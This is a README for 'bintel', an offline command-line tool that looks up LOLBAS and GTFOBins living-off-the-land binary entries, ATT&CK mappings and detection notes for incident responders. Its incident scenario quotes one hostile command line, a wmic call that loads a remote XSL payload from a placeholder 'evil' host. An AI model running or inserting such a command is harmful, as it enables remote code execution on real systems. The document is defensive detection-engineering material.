Offline CLI for LOLBAS + GTFOBins. Ask "what can this binary be abused for?" and get an answer in your terminal, not in 8 browser tabs.
An incident lands. The command line is wmic.exe os get /format:"http://evil/p.xsl". You need to know — right now — what wmic can do, which ATT&CK technique this maps to, and what detection you should write.
Currently: alt-tab, open lolbas-project.github.io, scroll, ctrl-F, read three sections, copy the ATT&CK ID, alt-tab back.
With bintel:
$ bintel wmic.exe
And you get the abuse techniques, example commands, ATT&CK mappings, and detection notes inline.
Requires Python 3.9+.
git clone https://github.com/pashasec/bintel.git
cd bintel
./run.sh wmic.exeThat's it. run.sh creates a virtualenv on first call, installs deps, runs the tool, and is idempotent — subsequent calls just run.
Windows:
git clone https://github.com/pashasec/bintel.git
cd bintel
run.bat wmic.exeOut of the box, bintel ships with a curated catalog of 15 of the most operationally important LOTL binaries. Run bintel update once to pull the full ~190 LOLBAS + ~370 GTFOBins entries into your local cache (~/.bintel/cache.json).
bintel <name> # detailed view of one binary
bintel show <name> [--json] # same as above, explicit
bintel search <query> [--platform windows] [--attck T1218] [--json]
bintel list [--platform linux] [--attck T1059]
bintel update # fetch latest LOLBAS + GTFOBins
bintel info # catalog + cache statsbintel certutil.exe # the canonical LOTL downloader
bintel search downloader # find every entry tagged as a downloader
bintel search xsl --platform windows # AWL-bypass primitives
bintel list --attck T1218 # every System Binary Proxy Execution variant
bintel list --platform linux --json # pipe to jq for custom reports| Field | Source |
|---|---|
| Name + platform (windows / linux) | LOLBAS / GTFOBins |
| Categories (Execution, Download, SUID, Sudo, ...) | both |
| MITRE ATT&CK technique IDs | LOLBAS |
| Abuse techniques: name + command + notes | both |
| Detection guidance (process name, command-line patterns) | LOLBAS + curated |
| Resource links back to upstream | both |
bintel show <name> --json emits a stable JSON schema you can pipe into SIEM, Splunk, or your own detection-engineering workflow.
If you want bintel on your PATH instead of ./run.sh:
# Recommended: pipx (managed venv, command available everywhere)
pipx install -e .
# Or: classic virtualenv
python3 -m venv .venv && source .venv/bin/activate
pip install -e .
bintel wmic.exePyPI release is planned; for now install from source.
- Builtin catalog (
bintel/data/builtin.json) — 15 curated entries that ship with the package. Works offline immediately. - Update cache (
~/.bintel/cache.json) — populated bybintel update, fetched from the public LOLBAS and GTFOBins JSON endpoints. Cache shadows builtin per-name, so updates pick up upstream fixes. - Normalized schema — both sources are mapped to the same
Binary { categories, attck, functions, detection, resources }shape, so downstream tooling doesn't care where an entry came from.
pip install -e ".[dev]"
pytest- Sigma rule generation from
detectionfield - Splunk / Elastic / KQL query generation
-
bintel diff— show what changed between twobintel updateruns -
bintel grep <pattern>— point at a log file, highlight every LOTL invocation found - Tab completion for binary names
PRs welcome.
The catalog content comes from two outstanding community projects that you should star:
- LOLBAS Project — Windows Living Off The Land Binaries, Scripts and Libraries. Maintained by @Oddvarmoe and contributors.
- GTFOBins — Unix binaries that can be exploited to bypass local security restrictions. Maintained by @norbemi, @cyrus_and, and contributors.
bintel is a CLI wrapper around their work. The research and catalog they maintain is what makes this tool useful.
MIT — see LICENSE.
Part of the 30 tools in 30 days challenge.